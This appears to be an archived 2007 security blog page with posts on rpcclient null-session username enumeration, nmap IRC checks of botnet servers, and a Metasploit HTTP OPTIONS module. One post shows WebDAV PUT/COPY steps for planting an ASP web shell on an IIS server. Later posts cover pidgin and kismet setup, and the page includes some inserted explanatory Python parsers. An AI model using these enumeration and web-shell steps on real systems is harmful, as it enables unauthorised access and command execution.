carnal0wnage [Shared Reader]

Wednesday, August 29, 2007

More of using rpcclient to find usernames

So say you are given the assignment of doing an audit in a non-English speaking country. You are at a minimum going to have to locate how they spell "administrator" in the country in question. If Google doesn't help you or gives you multiple options (like it did me this time), and you can find a box running Samba or with file and printer sharing enabled and shared to the world (like you aren't supposed to do), then you can use rpcclient to pull out the usernames with a null session.

null sessions still rule in 2007...

cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit


There you have it:

rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)

oh and thanks for the name of the box too :-)
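Added example, not from the post: a few lines of Python that parse the SIDs from the session above and map them to their language-independent meaning, so the account holding RID 500 is identified whatever it is called (Administrador, Administrator, or a renamed account). The sample output is copied from the session above; the SID and RID tables are the standard Windows well-known values.

```python
import re

# Constructed sample: the lsaenumsid / lookupsids lines from the post.
RPCCLIENT_OUTPUT = """\
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\\Convidado (1)
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\\Administrador (1)
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\\IWAM_NSL09 (1)
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\\IUSR_NSL09 (1)
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\\TsInternetUser (1)
S-1-1-0
"""

# Well-known SIDs and RIDs: their meaning does not depend on the display language
# or on whether the account was renamed.
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-6": "Service",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-547": "BUILTIN\\Power Users",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest", 502: "krbtgt"}

# machine/domain SID, then the RID, then an optional resolved name
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)(?:\s+(\S+))?")

def classify(output):
    """Return (sid, meaning, resolved_name) for every SID line in rpcclient output.
    RIDs >= 1000 are accounts created after install; lower RIDs are reserved."""
    findings = []
    for line in output.splitlines():
        line = line.strip()
        if line in WELL_KNOWN_SIDS:
            findings.append((line, WELL_KNOWN_SIDS[line], None))
            continue
        m = SID_RE.match(line)
        if not m:
            continue
        rid, name = int(m.group(2)), m.group(3)
        meaning = WELL_KNOWN_RIDS.get(rid, "user-created account" if rid >= 1000 else "reserved RID")
        findings.append((line.split()[0], meaning, name))
    return findings

def localized_admin(output):
    """Name of the account that carries RID 500, regardless of what it is called."""
    for sid, _meaning, name in classify(output):
        if sid.endswith("-500") and name:
            return name.split("\\", 1)[-1]
    return None
```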


fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html

-CG

Nmap's ircServerInfo script

I installed nmap's latest SoC (Summer of Code) v6 release yesterday. Lots of new features and functionality especially Umit, the new GUI and NSE, the nmap scripting engine. http://insecure.org/nmap/man/man-nse.html
I was really curious about the ability to script nmap to perform different types of scans, vulnerability detection, version detection, etc...

One of the scripts that comes with nmap was of particular interest to me: ircServerInfo.nse. I've been spending a lot of time playing "whack-a-bot", my version of "whack-a-mole", and it's annoying to have to track and confirm that the box is connecting to a Command & Control server, so a quick and possibly automated way to do some basic checks of the remote IP would save me a lot of grunt work. While botnets are getting more and more advanced and are using different protocols, peer to peer, fast flux DNS and HTTP to remain up, there are still a huge number of botnets that rely on good ol' IRC. I'll cover fast flux DNS botnets in an upcoming post. Very interesting stuff, all of which is making these botnets more and more resilient to takedown.

Often I'll want details from the server itself while building information on the botnet so I can either send it to the server/desktop group in charge of that box or just keep it for my records and research.

One warning before running this against random IRC C&C servers. The script gets information from IRC servers by issuing STATS, LUSERS, etc. queries, so it is actively connecting to the servers. It also lets the server operator know that you were there. :)

sd:send("USER nmap +iw nmap :Nmap Wuz Here\nNICK " .. curr_nick .. "\n") <-- snippet of code from the script

Having tested this script with various IRC servers, I have noticed that the results are somewhat varied.

C:\tools\nmap>nmap -sC --script=ircServerInfo.nse 140.211.xxx.xxx

Starting Nmap 4.22SOC6 ( http://insecure.org ) at 2007-08-29 20:31 Eastern Daylight Time
Interesting ports on xxxxxxx.freenode.net (140.211.xxx.xxx):
Not shown: 1694 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp closed http
113/tcp closed auth
443/tcp closed https
6666/tcp open irc-serv
6667/tcp open irc
| IRC Server Info: Server: xxxxx.freenode.net
| Version: hyperion-1.0.2b(382). xxxxx.freenode.net
| Lservers/Lusers: 0/2882
| Uptime: 48 days, 21:40:26
| Source host:xxxxxxxxxx.com
|_ Source ident: OK n=nmap
7000/tcp open afs3-fileserver
7070/tcp open realserver
8000/tcp open http-alt

As you can see it returns some very interesting and valuable information. I could have specified the particular port that the server was running on to exclude the additional information.

Let's have a look at another one:

C:\tools\nmap>nmap -sC --script=ircServerInfo.nse xxxx.undernet.org

Starting Nmap 4.22SOC6 ( http://insecure.org ) at 2007-08-30 09:52 Eastern Daylight Time
Interesting ports on xxx.xxxxxxx.com (69.16.xxx.xxx):
Not shown: 1701 filtered ports
PORT STATE SERVICE
5555/tcp open freeciv
6666/tcp open irc-serv
6667/tcp open irc
| IRC Server Info: Server: xxxx.undernet.org
| Servers/Ops/Chans/Users: 28/77/34161/112880 <-- A lot of "users" pwnt!
|_ Lservers/Lusers: 1/11690
7000/tcp open afs3-fileserver

Depending on the server the amount of information varies.

My next test on a server running on a different port seemed to fail and returned no data from the server at all.

C:\tools\nmap>nmap -sC --script=ircServerInfo.nse 85.248.xxx.xxx -p80

Starting Nmap 4.22SOC6 ( http://insecure.org ) at 2007-08-30 10:09 Eastern Daylight Time
Interesting ports on 85.248.115.244:
PORT STATE SERVICE
80/tcp open http

Odd, I know that there is an IRC server listening on TCP/80. Let's see what nmap's service detection tells me:

PORT STATE SERVICE VERSION
80/tcp open irc Unreal ircd
Service Info: Host: irc.foonet.com <-- See! Let's try something else:

C:\tools\wget>WGET 85.248.xxx.xxx
--23:10:19-- http://85.248.xxx.xxx/
=> `index.html'
Connecting to 85.248.115.244:80... connected.
HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9
Length: unspecified
[ <=>] 440 52.00B/s
23:10:55 (12.60 B/s) - `index.html' saved [440]

Interesting result, that. Let's see what the index.html contains:

xxx.foonet.com NOTICE AUTH :*** Looking up your hostname...
xxx.foonet.com NOTICE AUTH :*** Found your hostname
xxx.foonet.com 451 GET :You have not registered
xxx.foonet.com 451 User-Agent: :You have not registered
xxx.foonet.com 451 Accept: :You have not registered
xxx.foonet.com 451 Host: :You have not registered
xxx.foonet.com 451 Connection: :You have not registered

So it definitely is an IRC server. Why did the nmap scan not return that information to me? Let's take another quick look at the script.
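Added example, not from the post or from the NSE script: a small Python check that recognises an IRC server from its raw reply the way the wget output above does, so a listener on an unexpected port can be classified from what it says rather than from the port number. Both sample responses are constructed (the IRC one is the index.html above); the helper names are mine.

```python
import re

# Constructed sample: the index.html that wget pulled from TCP/80 in the post.
# Every HTTP request line wget sent was read as an IRC command, hence the 451s.
IRC_ON_PORT_80 = """\
xxx.foonet.com NOTICE AUTH :*** Looking up your hostname...
xxx.foonet.com NOTICE AUTH :*** Found your hostname
xxx.foonet.com 451 GET :You have not registered
xxx.foonet.com 451 User-Agent: :You have not registered
xxx.foonet.com 451 Host: :You have not registered
"""
# Constructed sample: what a real web server answers to the same request.
PLAIN_HTTP = "HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Length: 0\r\n\r\n"

# A server prefix is ":name" (RFC 1459) or, as this daemon prints it, a bare hostname.
PREFIX_RE = re.compile(r"^:?[A-Za-z0-9][A-Za-z0-9.-]*$")
NUMERIC_RE = re.compile(r"^\d{3}$")
SERVER_COMMANDS = {"NOTICE", "PING", "ERROR", "PRIVMSG"}

def parse_irc_line(line):
    """Split one line into (prefix, command, params, trailing); None if nothing is there."""
    trailing = None
    if " :" in line:                      # trailing parameter starts at the first " :"
        line, trailing = line.split(" :", 1)
    tokens = line.split()
    prefix = None
    if (len(tokens) > 1 and PREFIX_RE.match(tokens[0])
            and (tokens[0].startswith(":") or "." in tokens[0])):
        prefix = tokens.pop(0).lstrip(":")
    if not tokens:
        return None
    return prefix, tokens[0], tokens[1:], trailing

def looks_like_irc(data):
    """True when most non-empty lines carry an IRC numeric reply or server command."""
    lines = [l.strip() for l in data.splitlines() if l.strip()]
    hits = 0
    for l in lines:
        parsed = parse_irc_line(l)
        if parsed and (NUMERIC_RE.match(parsed[1]) or parsed[1] in SERVER_COMMANDS):
            hits += 1
    return bool(lines) and hits * 2 > len(lines)

def echoed_commands(data):
    """Request lines the server rejected with 451: shows why an HTTP probe gets no banner."""
    out = []
    for l in data.splitlines():
        parsed = parse_irc_line(l.strip())
        if parsed and parsed[1] == "451" and parsed[2]:
            out.append(parsed[2][0])
    return out
```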

portrule = shortport.port_or_service(6667, "irc") <-- that might explain it.

It appears that it is only checking the standard IRC port of tcp/6667. That's no good. I guess the options would be to modify the script to use the -p option for input or, as a quick test, to change the port and service. Let's try that.

Interesting ports on 85.248.xxx.xxx:
PORT STATE SERVICE
80/tcp open httP

Still no luck! Well, this is going to take some more looking into. Annoying to say the least. It might be that it's checking for certain headers, referrers, etc. Or it might be an IRC daemon that is not supported by the script, but according to the author's post on nmap-dev it currently supports ratbox, ircnet, bahamut and unreal. I'm a little short on time at the moment but I will see if I can come up with an answer to this.

So, while it is not perfect the script has a lot of value. I highly recommend looking in the ../scripts directory at all the current scripts. There are about 30 or so.

Cheers,
Dean

Sunday, August 26, 2007

BackTrack2 is NOT an operating system!!!

ok over on EH.net there are a couple of running threads on installing backtrack to Hard Disk/Drive so people can use BackTrack2 as their Operating System.

here is one of them: link; i don't feel like looking up the rest (really not the point) but this has been going on for some time now (really since BT1).

OK i am going to vent for just a sec but i do have a point...

BACKTRACK IS NOT AN OPERATING SYSTEM! it is a TOOL!!

yes obviously you can run it as an operating system (hence the whole point of the rant) but why do you NEED to do that?

frankly the best education comes from building your own attack platform on the linux distro you installed, configured, and hardened yourself. You install, configure and mess with the tools YOU need to do your pentesting (or scanning your local ISP subnet) and don't have a bunch of extra crap you don't need. You get to work through library issues and crap breaking and getting so pissed at your box that you want to dropkick it out the window, but guess what, you LEARN doing all that.

one of the biggest things i see over at LSO and during the rootwars is people having weak linux skills and not being able to compile and use their own tools, so naturally we ask what distro they run and most of the time i get backtrack for an answer :-(

Don't get me wrong, i like backtrack2 as a TOOL, i boot the ISO in VMware, i do what i need to do, then i go back to my linux distro to read email and everything else. I have a couple of personal reasons for that, one of them being deniability with the non-persistent option :-) but mostly for the reasons above; if i am going to go through the trouble of installing a distro I might as well get something out of the install (linux knowledge-wise) instead of letting someone else do all the work for me.

just my thoughts on it. spend that effort installing that great set of tools that backtrack comes with on your own; you'll learn more, really get an idea if you actually NEED all of those tools, and get the satisfaction of having control over your linux install.

-CG

Thursday, August 23, 2007

Should I be flattered or worried...

so I was playing on my LinkedIn account and checked the "who has viewed your profile" option. one category caught my eye. not sure if I should be flattered or worried that someone from the ministry of defense is taking a look-see...


Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module, i wanted to see if i could get one going that would pull down the HTTP verbs allowed on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
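Added example, not the module's code and not from the post: a Python parser that takes an OPTIONS reply like the two above, unions the Allow and Public headers (IIS lists its WebDAV verbs in both) and reports the methods a server owner should review. The two responses are constructed from the output shown above; the request builder uses CRLF line endings because HTTP requires them.

```python
# Constructed sample: the IIS 6.0 reply to "OPTIONS * HTTP/1.0" from the post (trimmed).
IIS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "DAV: 1,2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "\r\n"
)
# Constructed sample: the second host's answer, as the module printed it.
APACHE_RESPONSE = "HTTP/1.1 200 OK\r\nAllow: GET,HEAD,POST,OPTIONS,TRACE\r\n\r\n"

# Verbs that let a client write to the document root or change server state;
# TRACE, PROPFIND and SEARCH only disclose information but still deserve a look.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
REVIEW_METHODS = WRITE_METHODS | {"TRACE", "PROPFIND", "SEARCH"}

def build_options_request(host):
    """Every HTTP line ends in CRLF; bare newlines are what produce 400 Bad Request."""
    return "OPTIONS * HTTP/1.0\r\nHost: %s\r\n\r\n" % host

def parse_response(raw):
    """Return (status_code, headers) with header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers

def allowed_methods(raw):
    """Union of the Allow and Public headers, upper-cased and stripped."""
    _, headers = parse_response(raw)
    methods = set()
    for name in ("allow", "public"):
        methods.update(m.strip().upper() for m in headers.get(name, "").split(",") if m.strip())
    return methods

def audit(raw):
    """What an administrator should look at: reviewable verbs, write access, WebDAV flag."""
    methods = allowed_methods(raw)
    _, headers = parse_response(raw)
    return {"review": sorted(methods & REVIEW_METHODS),
            "writable": bool(methods & WRITE_METHODS),
            "webdav": "dav" in headers}
```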

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with our cmdx.aspx to list the directory contents of the C drive


-CG

Sunday, August 12, 2007

Getting the SILC plugin to work with pidgin on ubuntu 7.04

maybe it's common knowledge to everyone else, but since i couldn't find a good answer with google i'll post up how i got the silc plugin and googletalk to work with pidgin on ubuntu 7.04.

first, ubuntu has some stupid ass permissions on a lot of stuff and you have to use sudo for everything. i'm still undecided if ubuntu is staying around, but this can even cause you to be unable to read files and folders that you own (like i said, stupid)

well when you start up pidgin as your user account everything works pretty well, except when you try to run your silc module. you'll probably get a "can't create silc key pair" error. googling won't do you much good, and you'll look where it tells you the key is (/home/$userid/.silc/public_key.pub & private_key.prv) and you won't have any keys there. Copying keys over from another silc client won't work.

so the fix is to run pidgin as root so it will generate the keys for you.

cg@segfault:~$ sudo pidgin
Password:
Public key has been saved into `/root/.silc/public_key.pub'.
Private key has been saved into `/root/.silc/private_key.prv'.


after that, copy those new spiffy keys from /root/ to your home directory

cg@segfault:~$ sudo su
root@segfault:/home/cg# cp /root/.silc/public_key.pub /home/cg/.silc/
root@segfault:/home/cg# cp /root/.silc/private_key.prv /home/cg/.silc/


things should work after that.

i also had issues with ssl support, google actually helped out this time and i found

http://developer.pidgin.im/wiki/FAQssl

you need to compile with the libgnutls package.


sudo apt-get install libgnutls-dev

then recompile from source

./configure --enable-gnutls

MSN and GoogleTalk should work after that.

Wednesday, August 8, 2007

Playing with Kismet

A few people know i am recovering from my iBook dying.

of course like a jackass, i wasn't backing up properly, which is kind of a bummer, but sometimes it's nice to start fresh. if any of you ever sent me an email i wanted to keep, can you please resend it :-)

anyway, the silver lining of all of this is i got a new lappy (Toshiba A135-S4727) with a built in atheros card so i can finally use that hacking exposed wireless book i borrowed from work (and won't be returning) and can play with some of the wireless hack tools. I'm running Ubuntu 7.04 so it was fairly easy to get things up and running. A couple of quick apt-gets and a little editing of the kismet conf file and i was up and running.

$sudo apt-get install madwifi-tools
$sudo apt-get install kismet


after you install the madwifi tools you should see the wifi0 interface when you do an ifconfig

wifi0 Link encap:UNSPEC HWaddr 00-19-7E-8A-BB-F4-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1399800 errors:113005 dropped:98619 overruns:0 frame:1332679
TX packets:98112 errors:2 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:283152996 (270.0 MiB) TX bytes:12557358 (11.9 MiB)
Interrupt:16


change directories into /etc/kismet and edit the kismet.conf file to use the madwifi_ag drivers

source=madwifi_ag,wifi0,Atheros

after that you should be good to go:

$sudo kismet










Links

http://www.kismetwireless.net/


http://www.wi-fiplanet.com/tutorials/article.php/3595531